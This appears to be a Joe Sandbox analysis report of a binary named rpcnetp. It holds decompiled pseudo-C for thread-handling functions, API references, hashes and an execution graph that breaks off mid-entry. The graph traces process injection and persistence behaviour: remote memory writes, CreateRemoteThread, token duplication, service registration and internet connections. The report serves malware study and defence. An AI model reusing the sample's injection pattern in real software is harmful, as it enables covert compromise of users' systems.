			E72B22EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;

				if( *0x72b260a8 == 0) {
					L5:
					__eflags =  *0x72b26088;
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E72B237BE(_t5, __eflags, 0x72b2603c,  *0x72b260a0);
						__eflags =  *0x72b2605f;
						if( *0x72b2605f == 0) {
							 *0x72b260b8 = 0;
						}
						__eflags =  *0x72b260b8;
						if( *0x72b260b8 != 0) {
							L12:
							 *0x72b26030 = 0x72b2603c;
							_t6 = CreateThread(0, 0, E72B23132, 0, 0, 0x72b26148);
							 *0x72b260a8 = _t6;
						} else {
							 *0x72b26034 =  *0x72b26034 + 1;
							__eflags =  *0x72b26034 - _a4;
							if(__eflags < 0) {
								 *((char*)( *0x72b260a0)) = 0;
								E72B237BE( *0x72b260a0, __eflags, 0x72b2603c,  *0x72b260a0);
								 *0x72b2605f = 1;
								 *0x72b260b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0x72b26148, 0x12, 0, 0);
					WaitForSingleObject( *0x72b260a8, 0x7530);
					CloseHandle( *0x72b260a8);
					 *0x72b260a8 = 0;
					_t5 =  *((intOrPtr*)(E72B23C14(0x1e, 0,  &_v8)));
					if( *0x72b2602c != 0 ||  *0x72b260b8 != 0) {
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						goto L5;
					}
				}
				return _t6;
			}






0x72b22eae
0x72b22f0c
0x72b22f0d
0x72b22f13
0x72b22f4c
0x72b22f4c
0x72b22f15
0x72b22f21
0x72b22f26
0x72b22f2c
0x72b22f2e
0x72b22f2e
0x72b22f34
0x72b22f3a
0x72b22f71
0x72b22f7f
0x72b22f85
0x72b22f8b
0x72b22f3c
0x72b22f3c
0x72b22f47
0x72b22f4a
0x72b22f55
0x72b22f5e
0x72b22f63
0x72b22f6a
0x00000000
0x00000000
0x00000000
0x00000000
0x72b22f4a
0x72b22f3a
0x72b22eb0
0x72b22eba
0x72b22ecb
0x72b22ed7
0x72b22ee4
0x72b22eef
0x72b22ef7
0x72b22f03
0x00000000
0x72b22f05
0x72b22f05
0x72b22f05
0x00000000
0x00000000
0x00000000
0x72b22ef7
0x72b22f93

APIs
  • PostThreadMessageA.USER32 ref: 72B22EBA
  • WaitForSingleObject.KERNEL32(00007530), ref: 72B22ECB
  • CloseHandle.KERNEL32 ref: 72B22ED7
  • CreateThread.KERNEL32(00000000,00000000,72B23132,00000000,00000000,72B26148), ref: 72B22F85
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
  • String ID:
  • API String ID: 3204264564-0
  • Opcode ID: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction ID: 55e1e3665506082e23fab281f5e934d135a5a335b73c88e28fd5a4c76e9a1134
  • Opcode Fuzzy Hash: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction Fuzzy Hash: 5021A7724853C4BFEB22D726C8C0B473FE9E70D2C6722081CE54AC7117D3210899E755
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A12EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;

				if( *0xa160a8 == 0) {
					L5:
					__eflags =  *0xa16088;
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E00A137BE(_t5, __eflags, 0xa1603c,  *0xa160a0);
						__eflags =  *0xa1605f;
						if( *0xa1605f == 0) {
							 *0xa160b8 = 0;
						}
						__eflags =  *0xa160b8;
						if( *0xa160b8 != 0) {
							L12:
							 *0xa16030 = 0xa1603c;
							_t6 = CreateThread(0, 0, E00A13132, 0, 0, 0xa16148);
							 *0xa160a8 = _t6;
						} else {
							 *0xa16034 =  *0xa16034 + 1;
							__eflags =  *0xa16034 - _a4;
							if(__eflags < 0) {
								 *((char*)( *0xa160a0)) = 0;
								E00A137BE( *0xa160a0, __eflags, 0xa1603c,  *0xa160a0);
								 *0xa1605f = 1;
								 *0xa160b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0xa16148, 0x12, 0, 0);
					WaitForSingleObject( *0xa160a8, 0x7530);
					CloseHandle( *0xa160a8);
					 *0xa160a8 = 0;
					_t5 =  *((intOrPtr*)(E00A13C14(0x1e, 0,  &_v8)));
					if( *0xa1602c != 0 ||  *0xa160b8 != 0) {
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						goto L5;
					}
				}
				return _t6;
			}






0x00a12eae
0x00a12f0c
0x00a12f0d
0x00a12f13
0x00a12f4c
0x00a12f4c
0x00a12f15
0x00a12f21
0x00a12f26
0x00a12f2c
0x00a12f2e
0x00a12f2e
0x00a12f34
0x00a12f3a
0x00a12f71
0x00a12f7f
0x00a12f85
0x00a12f8b
0x00a12f3c
0x00a12f3c
0x00a12f47
0x00a12f4a
0x00a12f55
0x00a12f5e
0x00a12f63
0x00a12f6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00a12f4a
0x00a12f3a
0x00a12eb0
0x00a12eba
0x00a12ecb
0x00a12ed7
0x00a12ee4
0x00a12eef
0x00a12ef7
0x00a12f03
0x00000000
0x00a12f05
0x00a12f05
0x00a12f05
0x00000000
0x00000000
0x00000000
0x00a12ef7
0x00a12f93

APIs
  • PostThreadMessageA.USER32 ref: 00A12EBA
  • WaitForSingleObject.KERNEL32(00007530), ref: 00A12ECB
  • CloseHandle.KERNEL32 ref: 00A12ED7
  • CreateThread.KERNEL32(00000000,00000000,00A13132,00000000,00000000,00A16148), ref: 00A12F85
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
  • String ID:
  • API String ID: 3204264564-0
  • Opcode ID: d2e71c7b4b0023461e103ccdaf62b3af7fbed5a53af77e0bc65cb1954733cb51
  • Instruction ID: d09e5ba222ce55b01dae2f5128c9ac96e5cded5fe215e3e7a2abb97474652b9d
  • Opcode Fuzzy Hash: d2e71c7b4b0023461e103ccdaf62b3af7fbed5a53af77e0bc65cb1954733cb51
  • Instruction Fuzzy Hash: B2219F79445284BEEF11DBE0BD80AD63F7AA71D384B09C069F545C6132C3618EEBDB24
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E72B21DE6(_t14, 0x7fffffff);
					}
					E72B21E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}






0x72b21f34
0x72b21f39
0x72b21f3b
0x72b21f3f
0x72b21f47
0x72b21f47
0x72b21f4d
0x72b21f52
0x72b21f5a
0x72b21f6d
0x72b21f77
0x72b21f77
0x72b21f83
0x72b21f83
0x00000000
0x72b21f8a
0x72b21f92

APIs
  • WaitForSingleObject.KERNEL32(?,00001388), ref: 72B21F62
  • TerminateThread.KERNEL32(?,00000000), ref: 72B21F77
  • CloseHandle.KERNEL32(?), ref: 72B21F83
  • LocalFree.KERNEL32(?), ref: 72B21F8A
    • Part of subcall function 72B21DE6: GetMessageA.USER32 ref: 72B21E0C
    • Part of subcall function 72B21DE6: TranslateMessage.USER32(?), ref: 72B21E33
    • Part of subcall function 72B21DE6: DispatchMessageA.USER32 ref: 72B21E3D
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
  • String ID:
  • API String ID: 2048180657-0
  • Opcode ID: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction ID: 30d08b297c30fda9417a0af8e49c41b064fc214c9d90f03f7e5885ec2cf4e8c1
  • Opcode Fuzzy Hash: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction Fuzzy Hash: 4AF0B432161B10ABC7216A26CC08BCB76ECDF81796F111514F62AA6183C77455408B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A11F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E00A11DE6(_t14, 0x7fffffff);
					}
					E00A11E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}






0x00a11f34
0x00a11f39
0x00a11f3b
0x00a11f3f
0x00a11f47
0x00a11f47
0x00a11f4d
0x00a11f52
0x00a11f5a
0x00a11f6d
0x00a11f77
0x00a11f77
0x00a11f83
0x00a11f83
0x00000000
0x00a11f8a
0x00a11f92

APIs
  • WaitForSingleObject.KERNEL32(?,00001388), ref: 00A11F62
  • TerminateThread.KERNEL32(?,00000000), ref: 00A11F77
  • CloseHandle.KERNEL32(?), ref: 00A11F83
  • LocalFree.KERNEL32(?), ref: 00A11F8A
    • Part of subcall function 00A11DE6: GetMessageA.USER32 ref: 00A11E0C
    • Part of subcall function 00A11DE6: TranslateMessage.USER32(?), ref: 00A11E33
    • Part of subcall function 00A11DE6: DispatchMessageA.USER32 ref: 00A11E3D
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
  • String ID:
  • API String ID: 2048180657-0
  • Opcode ID: 7b0c150b1f452b4bb1c34c94d097e3efb055df7c1b2296ae374339834d757f28
  • Instruction ID: 1c6aae05f1b48377124d60e0d9273015154b1b0493f446c0291fcd4c3bba5dad
  • Opcode Fuzzy Hash: 7b0c150b1f452b4bb1c34c94d097e3efb055df7c1b2296ae374339834d757f28
  • Instruction Fuzzy Hash: FCF02731A02A10AFC7216BA1DC09FCE779CEF05711F004116F715E9190CB709AC2CB91
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:18.2%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:0%
Total number of Nodes:496
Total number of Limit Nodes:15

Graph

Show Legend
Hide Nodes/Edges
execution_graph 2097 72b25313 2100 72b25320 2097->2100 2098 72b25126 14 API calls 2098->2100 2099 72b2534f 2100->2098 2100->2099 2101 72b2501f 11 API calls 2100->2101 2101->2100 2006 72b25277 2009 72b25288 2006->2009 2007 72b25303 2009->2007 2011 72b2501f 2009->2011 2021 72b25126 2009->2021 2012 72b25036 2011->2012 2027 72b21a44 2012->2027 2014 72b250e0 2015 72b21a44 11 API calls 2014->2015 2016 72b250e8 2015->2016 2032 72b21b9e 2016->2032 2018 72b21a44 11 API calls 2020 72b25042 2018->2020 2019 72b250ee 2019->2009 2020->2014 2020->2018 2025 72b25136 2021->2025 2023 72b25259 2023->2009 2025->2023 2026 72b2501f 11 API calls 2025->2026 2043 72b219ca 2025->2043 2052 72b21ab5 2025->2052 2026->2025 2038 72b21a9d 2027->2038 2030 72b21a79 2030->2020 2031 72b21b9e 11 API calls 2031->2030 2035 72b21bbc 2032->2035 2033 72b21bf8 2033->2019 2034 72b21a9d RaiseException 2034->2035 2035->2033 2035->2034 2036 72b2162f 9 API calls 2035->2036 2037 72b21bdb Sleep WaitForSingleObject 2035->2037 2036->2035 2037->2035 2039 72b21a51 2038->2039 2040 72b21aa9 2038->2040 2039->2030 2039->2031 2042 72b2210c RaiseException 2040->2042 2042->2039 2044 72b21a9d RaiseException 2043->2044 2045 72b219db 2044->2045 2046 72b21a23 2045->2046 2047 72b21a9d RaiseException 2045->2047 2046->2025 2048 72b21a00 2047->2048 2049 72b21a06 WaitForSingleObject 2048->2049 2050 72b21a17 2048->2050 2049->2050 2051 72b215cc 4 API calls 2050->2051 2051->2046 2053 72b21a7e 2 API calls 2052->2053 2054 72b21ac2 ResetEvent 2053->2054 2055 72b215ad 2 API calls 2054->2055 2056 72b21ade 2055->2056 2056->2025 2102 72b21d17 2103 72b21d1a ExitThread 2102->2103 1606 72b22314 1622 72b24a94 1606->1622 1608 72b22323 GetStdHandle ReadProcessMemory 1609 72b22354 ReadProcessMemory 1608->1609 1610 72b2241b ExitThread 1608->1610 1609->1610 1611 72b2236d 1609->1611 1612 72b223a7 1611->1612 1614 72b2237c 1611->1614 1613 72b223ad ReadProcessMemory 1612->1613 1621 72b223a2 1612->1621 1613->1610 1615 72b223c5 1613->1615 1617 72b22394 SetEvent 1614->1617 1618 72b2239c ResetEvent 1614->1618 1614->1621 1616 72b223ee 1615->1616 1623 72b215cc 1615->1623 1630 72b2162f 1616->1630 1617->1621 1618->1621 1621->1610 1622->1608 1640 72b21a7e 1623->1640 1626 72b21620 1643 72b215ad LeaveCriticalSection 1626->1643 1628 72b215da 1628->1626 1629 72b2160d ResetEvent 1628->1629 1629->1628 1631 72b21650 1630->1631 1632 72b2163f 1630->1632 1634 72b21a7e 2 API calls 1631->1634 1651 72b2278e 1632->1651 1638 72b21657 1634->1638 1635 72b2164b 1635->1621 1636 72b216aa 1637 72b215ad 2 API calls 1636->1637 1637->1635 1638->1636 1639 72b21696 SetEvent 1638->1639 1639->1638 1646 72b21ae3 1640->1646 1644 72b21ae3 RaiseException 1643->1644 1645 72b215c7 1644->1645 1645->1616 1647 72b21af2 1646->1647 1648 72b21a8b EnterCriticalSection 1646->1648 1650 72b2210c RaiseException 1647->1650 1648->1628 1650->1648 1652 72b21a7e 2 API calls 1651->1652 1653 72b2279f 1652->1653 1658 72b2253c GetStdHandle 1653->1658 1656 72b215ad 2 API calls 1657 72b227ca 1656->1657 1657->1635 1663 72b23223 1658->1663 1660 72b2255a CreateRemoteThread 1661 72b22590 1660->1661 1662 72b22575 WaitForSingleObject GetExitCodeThread CloseHandle 1660->1662 1661->1656 1662->1661 1663->1660 2057 72b220f4 2058 72b220f7 2057->2058 2059 72b24dc6 3 API calls 2058->2059 2060 72b22104 2059->2060 2061 72b24474 2063 72b24483 2061->2063 2062 72b2449c 2063->2062 2065 72b2493c 2063->2065 2066 72b2494c 2065->2066 2066->2066 2067 72b24955 LoadLibraryA 2066->2067 2068 72b2496e GetProcAddress GetProcAddress GetProcAddress 2067->2068 2070 72b249de 2067->2070 2069 72b249a4 FreeLibrary 2068->2069 2069->2070 2070->2062 2072 72b23675 2073 72b23684 GetModuleHandleA 2072->2073 2074 72b236ac 2072->2074 2073->2074 2075 72b23690 2073->2075 2075->2074 2076 72b23694 GetProcAddress 2075->2076 2076->2074 2077 72b21c7b 2086 72b24a94 2077->2086 2079 72b21c87 LocalAlloc GetStdHandle 2080 72b21d1a ExitThread 2079->2080 2081 72b21cab WriteProcessMemory 2079->2081 2082 72b21d08 LocalFree 2081->2082 2083 72b21ccc ReadProcessMemory 2081->2083 2082->2080 2083->2082 2084 72b21ce1 2083->2084 2085 72b21f95 42 API calls 2084->2085 2085->2082 2086->2079 2106 72b22658 CreateEventA RegisterServiceCtrlHandlerA 2107 72b226aa 2106->2107 2120 72b22751 2106->2120 2121 72b22266 SetServiceStatus 2107->2121 2109 72b226c0 2122 72b22266 SetServiceStatus 2109->2122 2111 72b226d3 2123 72b22296 RegOpenKeyA 2111->2123 2114 72b22706 WaitForSingleObject 2117 72b2272a WaitForSingleObject CloseHandle 2114->2117 2118 72b2271f PostMessageA 2114->2118 2115 72b226fe 2116 72b2273d CloseHandle 2115->2116 2129 72b22266 SetServiceStatus 2116->2129 2117->2116 2118->2117 2121->2109 2122->2111 2124 72b22312 CreateThread 2123->2124 2125 72b222bb RegQueryValueExA 2123->2125 2124->2114 2124->2115 2130 72b23161 7 API calls 2124->2130 2126 72b222ed RegEnumValueA 2125->2126 2127 72b222e0 RegDeleteValueA 2126->2127 2128 72b22306 RegCloseKey 2126->2128 2127->2126 2128->2124 2129->2120 1664 72b232de GetVersion 1665 72b23307 GetStdHandle 1664->1665 1666 72b232fc 1664->1666 1689 72b23420 1665->1689 1666->1665 1669 72b2338f 1670 72b233a3 1669->1670 1674 72b233b1 CreateEventA 1669->1674 1675 72b2339c 1669->1675 1670->1674 1677 72b233c0 CreateThread 1670->1677 1688 72b23369 1670->1688 1671 72b23376 SetStdHandle 1671->1669 1672 72b23334 1697 72b22123 1672->1697 1674->1677 1747 72b21eda StartServiceCtrlDispatcherA 1675->1747 1676 72b23343 1713 72b22adb 1676->1713 1682 72b233da 1677->1682 1677->1688 1791 72b23161 1677->1791 1678 72b23413 CloseHandle 1679 72b23418 ExitProcess 1678->1679 1684 72b233e9 WaitForSingleObject CloseHandle 1682->1684 1685 72b233fc WaitForSingleObject CloseHandle 1682->1685 1683 72b23357 1686 72b23362 CloseHandle 1683->1686 1687 72b23365 1683->1687 1684->1685 1685->1688 1686->1687 1687->1669 1687->1688 1688->1678 1688->1679 1690 72b2343a 1689->1690 1691 72b2345b 1689->1691 1748 72b22842 GetModuleFileNameA 1690->1748 1692 72b23480 GetCurrentProcessId 1691->1692 1693 72b23318 1691->1693 1692->1693 1693->1669 1693->1671 1693->1672 1696 72b23459 1696->1691 1756 72b24a94 1697->1756 1699 72b2212f LoadLibraryA 1700 72b2221f 1699->1700 1701 72b22154 GetProcAddress 1699->1701 1703 72b22232 1700->1703 1704 72b22229 FreeLibrary 1700->1704 1701->1700 1702 72b2216d GetProcAddress 1701->1702 1702->1700 1708 72b22180 1702->1708 1705 72b22241 1703->1705 1706 72b22238 LocalFree 1703->1706 1704->1703 1705->1676 1706->1705 1707 72b22185 LocalAlloc 1707->1700 1707->1708 1708->1700 1708->1707 1709 72b221a8 LocalFree 1708->1709 1710 72b221c1 1708->1710 1709->1708 1710->1700 1711 72b221df OpenProcess 1710->1711 1711->1700 1712 72b221f4 OpenProcessToken CloseHandle 1711->1712 1712->1700 1757 72b24a94 1713->1757 1715 72b22aea GetCurrentProcessId OpenProcess 1718 72b22b24 1715->1718 1746 72b22cf2 1715->1746 1717 72b22cfe 1717->1683 1719 72b22b64 1718->1719 1758 72b22598 1718->1758 1721 72b22842 10 API calls 1719->1721 1722 72b22b75 1719->1722 1721->1722 1723 72b22bf6 CreateProcessA 1722->1723 1724 72b22b7a DuplicateTokenEx 1722->1724 1725 72b22c19 1723->1725 1726 72b22bb0 CreateEnvironmentBlock CreateProcessAsUserA 1724->1726 1727 72b22b9c SetTokenInformation 1724->1727 1729 72b22c97 1725->1729 1732 72b22842 10 API calls 1725->1732 1743 72b22c40 1725->1743 1726->1725 1728 72b22beb CloseHandle 1726->1728 1727->1726 1728->1725 1730 72b22caf 1729->1730 1731 72b22c9c TerminateProcess CloseHandle 1729->1731 1734 72b22cb4 CloseHandle 1730->1734 1730->1746 1731->1730 1735 72b22c30 1732->1735 1733 72b22c58 WriteProcessMemory 1736 72b22c7b 1733->1736 1737 72b22cbf ResumeThread 1733->1737 1734->1746 1767 72b227d2 VirtualAllocEx 1735->1767 1773 72b224bc CreateRemoteThread 1736->1773 1738 72b22cc8 1737->1738 1741 72b22cd0 CreateThread 1738->1741 1742 72b22cea 1738->1742 1741->1746 1781 72b22758 SetStdHandle WaitForSingleObject CloseHandle 1742->1781 1743->1733 1743->1746 1783 72b22d0b 1746->1783 1747->1688 1749 72b2286b lstrcpyA lstrlenA lstrcmpiA 1748->1749 1752 72b2293e LoadLibraryA 1748->1752 1751 72b228b2 lstrcpyA CopyFileA 1749->1751 1749->1752 1751->1752 1753 72b228cd CreateFileA 1751->1753 1752->1691 1752->1696 1753->1752 1754 72b228e7 SetFilePointer WriteFile CloseHandle 1753->1754 1754->1752 1756->1699 1757->1715 1759 72b225a9 GetSystemDirectoryA lstrcatA 1758->1759 1765 72b225cb 1758->1765 1766 72b2264b 1759->1766 1760 72b225cf lstrcpyA 1761 72b225e3 RegOpenKeyA 1760->1761 1760->1765 1762 72b225f7 RegQueryValueExA RegCloseKey 1761->1762 1761->1765 1763 72b2262b GetBinaryTypeA 1762->1763 1764 72b2261f lstrcatA 1762->1764 1763->1765 1764->1763 1765->1760 1765->1761 1765->1766 1766->1719 1768 72b22838 1767->1768 1769 72b227f8 lstrlenA WriteProcessMemory 1767->1769 1768->1743 1770 72b22814 1769->1770 1771 72b2282a VirtualFreeEx 1769->1771 1772 72b224bc 5 API calls 1770->1772 1771->1768 1772->1771 1774 72b2252b TerminateProcess 1773->1774 1778 72b224ee 1773->1778 1775 72b22535 1774->1775 1775->1729 1775->1738 1776 72b224f3 1777 72b22520 CloseHandle 1776->1777 1777->1775 1778->1776 1779 72b2250c WaitForMultipleObjects 1778->1779 1779->1777 1780 72b22516 GetExitCodeThread 1779->1780 1780->1777 1782 72b22783 1781->1782 1782->1746 1784 72b22d10 1783->1784 1785 72b22d23 1784->1785 1786 72b22d1d CloseHandle 1784->1786 1787 72b22d31 1785->1787 1788 72b22d28 CloseHandle 1785->1788 1786->1785 1789 72b22d36 CloseHandle 1787->1789 1790 72b22d3f 1787->1790 1788->1787 1789->1790 1790->1717 1797 72b24a94 1791->1797 1793 72b23170 GetModuleFileNameA RegisterClassA CreateWindowExA SetTimer 1794 72b231df GetMessageA 1793->1794 1795 72b231f0 TranslateMessage DispatchMessageA 1794->1795 1796 72b23206 1794->1796 1795->1794 1797->1793 2131 72b2455e 2134 72b21e8c 2131->2134 2133 72b24568 2135 72b21ec0 GetStdHandle TerminateProcess ExitProcess 2134->2135 2136 72b21e96 2134->2136 2136->2135 2137 72b21e9f 2136->2137 2137->2133 2138 72b2221c 2139 72b2221f 2138->2139 2140 72b22232 2139->2140 2141 72b22229 FreeLibrary 2139->2141 2142 72b22241 2140->2142 2143 72b22238 LocalFree 2140->2143 2141->2140 2143->2142 2144 72b2471c 2147 72b2472b 2144->2147 2146 72b248c6 2148 72b24f50 2147->2148 2149 72b24f61 2148->2149 2150 72b24f76 2148->2150 2151 72b24dc6 3 API calls 2149->2151 2153 72b24f6f 2149->2153 2150->2153 2154 72b24d83 2150->2154 2151->2153 2153->2146 2155 72b24d8f 2154->2155 2161 72b24da6 2154->2161 2157 72b24d44 GetVersion 2155->2157 2156 72b234a6 2 API calls 2158 72b24db2 2156->2158 2159 72b24d9b 2157->2159 2158->2153 2162 72b21b20 LocalAlloc 2159->2162 2161->2156 2163 72b21b39 2162->2163 2163->2161 1798 72b2351d 1799 72b23537 1798->1799 1800 72b235f4 KillTimer 1798->1800 1802 72b23543 1799->1802 1803 72b2354f 1799->1803 1801 72b23602 PeekMessageA 1800->1801 1801->1801 1804 72b23615 PostQuitMessage 1801->1804 1805 72b2354a 1802->1805 1827 72b22ea1 1802->1827 1806 72b23622 DefWindowProcA 1803->1806 1807 72b23559 KillTimer 1803->1807 1804->1806 1808 72b235c0 1804->1808 1805->1806 1806->1808 1810 72b23567 PeekMessageA 1807->1810 1810->1810 1812 72b2357a 1810->1812 1819 72b2327b 1812->1819 1813 72b235db 1813->1800 1816 72b235e3 SetTimer 1813->1816 1814 72b235cd SetEvent 1814->1813 1816->1808 1818 72b2358d SetTimer 1818->1806 1820 72b232af 1819->1820 1821 72b2328a 1819->1821 1824 72b22ea1 70 API calls 1820->1824 1822 72b23295 1821->1822 1823 72b232db 1821->1823 1825 72b22adb 47 API calls 1822->1825 1823->1806 1823->1818 1824->1823 1826 72b232a3 1825->1826 1826->1823 1828 72b22eb0 PostThreadMessageA WaitForSingleObject CloseHandle 1827->1828 1829 72b22f0c 1827->1829 1832 72b22eef 1828->1832 1831 72b22f4c 1829->1831 1838 72b237be 1829->1838 1831->1808 1831->1813 1831->1814 1832->1829 1833 72b22f05 1832->1833 1833->1831 1834 72b22f71 CreateThread 1834->1831 1843 72b23132 1834->1843 1836 72b237be 2 API calls 1837 72b22f63 1836->1837 1837->1834 1839 72b237d4 1838->1839 1840 72b22f26 1839->1840 1841 72b237e5 inet_addr 1839->1841 1842 72b237eb inet_ntoa 1839->1842 1840->1831 1840->1834 1840->1836 1841->1842 1842->1840 1844 72b2313e 1843->1844 1847 72b22ff9 1844->1847 1846 72b2314c 1849 72b2301a 1847->1849 1848 72b23081 LocalAlloc 1850 72b23094 GetCurrentThreadId 1848->1850 1857 72b230f8 1848->1857 1849->1848 1859 72b23065 PeekMessageA 1849->1859 1860 72b2307c 1849->1860 1861 72b22d7f LoadLibraryA 1849->1861 1873 72b24d14 1850->1873 1856 72b230bc CreateThread 1856->1857 1858 72b230e0 SetThreadPriority 1856->1858 1914 72b21c2c 1856->1914 1857->1849 1857->1860 1874 72b21f30 1857->1874 1858->1857 1859->1849 1859->1860 1885 72b22d40 1860->1885 1862 72b22db4 1861->1862 1866 72b22dac 1861->1866 1863 72b22dbd GetProcAddress 1862->1863 1865 72b22de1 InternetOpenA 1862->1865 1863->1862 1864 72b22dfd FreeLibrary 1863->1864 1864->1866 1865->1866 1867 72b22df3 1865->1867 1866->1849 1868 72b22e10 inet_ntoa 1867->1868 1869 72b22df8 1867->1869 1870 72b22e1a InternetConnectA 1868->1870 1869->1870 1870->1866 1871 72b22e34 1870->1871 1871->1866 1872 72b22e6d wsprintfA 1871->1872 1872->1866 1873->1856 1875 72b21f90 1874->1875 1876 72b21f3b 1874->1876 1875->1857 1877 72b21f4c 1876->1877 1889 72b21de6 1876->1889 1894 72b21e58 1877->1894 1881 72b21f89 LocalFree 1881->1875 1882 72b21f5c WaitForSingleObject 1883 72b21f6f TerminateThread 1882->1883 1884 72b21f7d CloseHandle 1882->1884 1883->1884 1884->1881 1886 72b22d7a PostMessageA 1885->1886 1887 72b22d4d FreeLibrary 1885->1887 1886->1846 1887->1886 1890 72b21e4b 1889->1890 1892 72b21dfb 1889->1892 1890->1877 1891 72b21e05 GetMessageA 1891->1892 1892->1890 1892->1891 1893 72b21e2f TranslateMessage DispatchMessageA 1892->1893 1893->1890 1893->1891 1895 72b22d40 FreeLibrary 1894->1895 1896 72b21e72 1895->1896 1901 72b216ba 1896->1901 1899 72b216ba 8 API calls 1900 72b21e87 1899->1900 1900->1881 1900->1882 1902 72b21759 1901->1902 1903 72b216cf EnterCriticalSection 1901->1903 1902->1899 1904 72b216f9 SetEvent 1903->1904 1905 72b216fc 1903->1905 1904->1905 1906 72b21706 SetEvent 1905->1906 1907 72b21709 1905->1907 1906->1907 1908 72b21734 1907->1908 1909 72b21719 WaitForSingleObject CloseHandle 1907->1909 1910 72b21741 1908->1910 1911 72b2173e CloseHandle 1908->1911 1909->1908 1912 72b2174b CloseHandle 1910->1912 1913 72b2174e DeleteCriticalSection 1910->1913 1911->1910 1912->1913 1913->1902 1917 72b21f95 1914->1917 1916 72b21c37 ExitThread 1939 72b24a94 1917->1939 1919 72b21fa4 GetStdHandle 1920 72b21fcf 1919->1920 1940 72b24d44 1920->1940 1922 72b22004 1923 72b2206c 1922->1923 1924 72b22031 GetStdHandle 1922->1924 1943 72b21775 1923->1943 1924->1923 1925 72b2203a 1924->1925 1928 72b22052 CreateRemoteThread 1925->1928 1928->1923 1929 72b220ee 1968 72b24dc6 1929->1968 1930 72b21775 32 API calls 1933 72b220a6 1930->1933 1932 72b22104 1932->1916 1933->1929 1934 72b220b9 1933->1934 1951 72b22429 1933->1951 1936 72b220e1 1934->1936 1937 72b220be ResumeThread WaitForMultipleObjects CloseHandle 1934->1937 1936->1929 1964 72b21d27 1936->1964 1937->1929 1939->1919 1941 72b24d58 1940->1941 1942 72b24d61 GetVersion 1941->1942 1942->1922 1944 72b2178a 